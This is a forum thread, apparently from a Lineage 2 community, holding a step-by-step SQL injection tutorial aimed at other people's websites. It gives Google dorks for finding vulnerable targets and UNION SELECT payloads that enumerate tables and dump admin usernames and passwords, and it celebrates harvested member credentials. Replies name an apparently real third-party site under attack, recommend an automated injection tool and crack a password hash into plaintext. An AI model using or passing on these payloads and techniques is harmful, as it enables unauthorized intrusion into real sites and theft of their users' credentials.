Jump to content

Recommended Posts

Posted (edited)

That is guide with i start before 3-4 months !
easy simple and everyone can do it !

SQL Inject by Search,Login,Facebook Option - Part 2
Read first that guide before start to read guide 2


Before we see what  SQL Injection is. We should know what SQL and Database are.

Database:
Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more. DB servers,MySQL(Open source),MSSQL, MS-ACCESS, Oracle, Postgre SQL(open source), SQLite

SQL:
Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language.

What is SQL Injection?
SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.

What an attacker can do?
* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server



Now lest do real SQL inject

Step 1: Finding Vulnerable Website:

Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use "inurl:" command for finding the vulnerable websites.

Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

How to use?
copy one of the above command and paste in the google search engine box.
Hit enter.
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
So Start from the first website.

Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:
 

    site:www.victimsite.com inurl:index.php?id=

Step 2: Checking the Vulnerability:

Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(') at the end of the url and hit enter. (No space between the number and single quotes)

For eg:



    http://www.victimsite.com/index.php?id=2''>http://www.victimsite.com/index.php?id=2'

If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable.

If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!!
For eg:

   

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding Number of columns:

Now we have found the website is vulnerable. Next step is to find the number of columns in the table.
For that replace the single quotes(') with "order by n" statement.(leave one space between number and order by n statement)

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".

For eg:


    http://www.victimsite.com/index.php?id=2 order by 1

    http://www.victimsite.com/index.php?id=2 order by 2

    http://www.victimsite.com/index.php?id=2 order by 3

    http://www.victimsite.com/index.php?id=2 order by 4

change the number until you get the error as "unknown column"

if you get the error while trying the "x"th number,then no of column is "x-1".

I mean:


http://www.victimsite.com/index.php?id=2 order by 1(noerror)

http://www.victimsite.com/index.php?id=2 order by 2(noerror)

http://www.victimsite.com/index.php?id=2 order by 3(noerror)

http://www.victimsite.com/index.php?id=2 order by 4(noerror)

http://www.victimsite.com/index.php?id=2 order by 5(noerror)

http://www.victimsite.com/index.php?id=2 order by 6(noerror)

http://www.victimsite.com/index.php?id=2 order by 7(noerror)

http://www.victimsite.com/index.php?id=2 order by 8(error)

so now x=8 , The number of column is x-1 i.e, 7.

Sometime the above may not work. At the time add the "--" at the end of the statement.
For eg:
 


http://www.victimsite.com/index.php?id=2 order by 1--


Step 4: Displaying the Vulnerable columns:

Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing).

Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:
if the number of columns is 7 ,then the query is as follow:



http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working then try this:
 

    http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--

It will show some numbers in the page(it must be less than 'x' value, i mean less than or equl to number of columns).

Like this:



Now select 1 number.
It showing 3,7. Let's take the Number 3.

Step 5: Finding version,database,user
Now replace the 3 from the query with "version()"

For eg:


http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--

It will show the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:

   

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

  http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:

 

  http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 6: Finding the Table Name
if the version is 5 or above. Then follow these steps.  Now we have to find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For eg:


   

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--

Now it will show the list of table names. Find the table name which is related with the admin or user.
Sql+Injection+3.JPG
Now select the "admin " table.

if the version is 4 or some others, you have to guess the table names. (user, tbluser).  It is hard and bore to do sql inection with version 4.

Step 7: Finding the Column Name
Now replace the "group_concat(table_name) with the "group_concat(column_name)"

Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--

Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .

Find MysqlChar() for Tablename:
First of all install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now
select sql->Mysql->MysqlChar()
Sql%20Injection%204.JPG
This will open the small window ,enter the table name which you found. i am going to use the admin table name.
Sql%20Injection%205.JPG

click ok

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.
Sql%20Injection%206.JPG

Copy and paste the code at the end of the url instead of the "mysqlchar"
For eg:

   

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

Now it will show the list of columns.
like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..


Now replace the replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).

Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name.


Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"

For eg:


http://www.victimsite.com/index.php?id=-2

and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

Sometime it will show the column is not found.
Then try another column names

Now it will Username and passwords.

Enjoy..!!cheers..!!

If the website has members then jock-bot for you. You will have the list of usernames and password.
Some time you may have the email ids also,enjoy you got the Dock which can produce the golden eggs.

Step 8: Finding the Admin Panel:

Just try with url like:
 

    http://www.victimsite.com/admin.php

    http://www.victimsite.com/admin/

    http://www.victimsite.com/admin.html

    http://www.victimsite.com:2082/

etc.
If you have luck ,you will find the admin page using above urls

P.S
Many programs can save your time with most steps

 

Edited by Bobi
Posted

Well i found a site with: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 error    and it give me Unknown column '4' in 'order clause'. So i put http://www.affordablecomfort.org/initiatives.php?PageID=-16 union select 1,2,3--    but i get error: The used SELECT statements have a different number of columns. Where i wrong?

Posted

Well i found a site with: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 error    and it give me Unknown column '4' in 'order clause'. So i put http://www.affordablecomfort.org/initiatives.php?PageID=-16 union select 1,2,3--    but i get error: The used SELECT statements have a different number of columns. Where i wrong?

 

ok lest continue here with Havij Program will be very easy now when u have right inject

 

http://youtu.be/0_2Ut-KQjD0

 

 

Posted

So if i want to get in some l2 server db how did you make the web site of the server vulnerable?

read guide man

Posted

I already read it 4 times.If i try with inurl:index.php?id= and site is only with .com at the end, then what?And the thing with (add the single quotes(') works in 3/50 sites.Can you explain me more about SQL Injection on pm if you have time?

Posted

Thx, but one q. How can i decrypt pw from db? For example i get:

user_password=$H$9i4.0FjDeW12tLFdft4aXFgH96zYVP1

they are many ways to decrypt passwords

Posted

please how can i crypt this password: MJ6EGB4omxBgZyshLV9WPpwBCKA=

use any program if you want mass decrypt or by website if is single decrypt

MJ6EGB4omxBgZyshLV9WPpwBCKA= : lion4500

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now



  • Posts

    • GoldRush launches tomorrow! July 18 16:00 GMT+3 Europe / International Register your account in the website, connect wallet and be ready to dominate!
    • 🏰 L2EXALTA LEGACY — Interlude x45 📅 Grand Opening: 31/07/2026 — 21:30 (GMT+3) 🌐 Website: https://l2exalta.org/ 💬 Discord: https://discord.gg/zNTCZD4AcT 📌 Wiki: https://l2exalta.org/en/wiki.html#progression   ⚙️ MAIN INFO Chronicle : Interlude Rates : x45 Adena : x50 Spoil : x1 Drop : x5 Safe Enchant : +3 Files : L2OFF   💰 ECONOMY EX Coin : dynamic market currency, mined from monsters, Raid Bosses and Grand Bosses value fluctuates over time Exalta Vouchers : premium currency used for store, donations and EX Coin exchange Exchange : convert EX Coin into Exalta Vouchers Investment options : choose safer or riskier market strategies with EX Coin   ⚔️ PROGRESSION & GEAR Exalta Armors : signature top-tier gear line Forge System : upgrade weapons, armor and jewels with risk/reward mechanics Raid Boss progression tied to materials and prestige   🤖 AUTOFARM Access : Auto Hunting button, bottom-right UI Duration : controlled via tickets or in-game currency Route Mode : record custom farm routes Support Mode : healer/support builds auto-follow, heal and assist party Smart targeting logic with class-specific behavior (mage/archer/melee/support) Captcha designed not to interrupt legitimate AutoFarm sessions   🧪 BUFFER Exalta Buffer NPC/interface Scheme Buffer : save multiple buff loadouts Class presets for mage, fighter, support, PvP   🛠️ SMART GADGETS / QOL Autoloot filter Drop value tracker Boss timer tools Farm stats tracker Auto-consume system In-game server assistant   🗺️ DUNGEON FINDER / PVE Party matching with roles (Tank / Healer / DPS) Ready-check before teleport Monastery of Silence custom PvE zone Party-based reward structure   🎟️ DAILY PROGRESS / EXALTA PASS Daily and weekly tasks (farm, PvP, boss, check-in) Premium Pass track with extra rewards Monastery Daily Quest Reward boards for claiming progress   🏠 HOUSING & EXPEDITIONS Player residences with service NPCs Exalta Spirit Expeditions to themed territories Rewards vary by territory Owner-only access   🏆 PVP / TOURNAMENT Scheduled Tournament system Ranking points from wins/participation Spectator Mode for watching live matches PvP Statues for top-ranked players Anti-feed protections   🛡️ CLAN CONTENT Clan Civil War battlefield event Clan Dungeon Raid content DPS Meter for contribution tracking Support Credit system Classic siege/clan politics preserved   🏪 AUCTION / SHOPS Auction House with seller fee Black Market Dealer (limited-time special offers) Custom shops and multisells Confirmation prompts on purchases/sales   💳 DONATIONS / VIP Donation rewards linked to Exalta Vouchers VIP tiers with comfort/cosmetic bonuses Premium store Gift/promo codes for events   🎥 STREAMER / COMMUNITY Streamer Panel with visible stream links Viewer rewards system Streamer Points for cosmetics/vouchers In-game voice chat (global/party/clan/alliance/command)   🔒 FAIR PLAY Strong Anti-Bot protection Reward protection tied to valid client state Captcha on suspicious activity Staff investigation tools No bots, packet tools or modified clients allowed   👑 GRANDBOSS SPAWNS Orfen : 1 day + 1h random Core : 1 day + 1h random Queen Ant : 1 day 6h + 1h random Zaken : 2 days 12h + 1h random Baium : 5 days + 1h random Antharas : 8 days + 1h random Valakas : 11 days + 1h random   🏅 OLYMPIAD Runs Thursday, Friday, Saturday Heroes change monthly Balanced and fair matchmaking
    • yup basically another one just in case https://drive.google.com/file/d/1UtccbD9e50x3WEnQBab2PTZnBHwpcGYM/view?usp=sharing LineageWarrior.FMagic (CollideActors = True; > False) LineageWarrior.FOrc (CollideActors = True; > False) LineageWarrior.FShaman (CollideActors = True; > False) LineageWarrior.MDarkElf (CollideActors = True; > False) LineageWarrior.MDwarf (CollideActors = True; > False) LineageWarrior.MElf (CollideActors = True; > False) LineageWarrior.MFighter (CollideActors = True; > False) LineageWarrior.MMagic (CollideActors = True; > False) LineageWarrior.MOrc (CollideActors = True; > False) LineageWarrior.MShaman (CollideActors = True; > False) LineageWarrior.FDwarf (CollideActors = True; > False) LineageWarrior.FElf (CollideActors = True; > False) LineageWarrior.FFighter (CollideActors = True; > False)
    • @l2naylondev Requiring a player to log in just for the sake of logging  seems exploitable. Someone could log in only to claim the reward and immediately leave, or repeatedly change their ip. So i guess  are there are additional protections in place ? such as locking the reward by account, character , and ip. It would also be useful to add a playtime requirement. For example, after logging in, the player would need to remain active for at least x playtime  before getting the reward or other parameters configurable by the xml.  I suggest improving the system before selling it. 
  • Topics

×
×
  • Create New...

Important Information

This community uses essential cookies to function properly. Non-essential cookies and third-party services are used only with your consent. Read our Privacy Policy and We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue..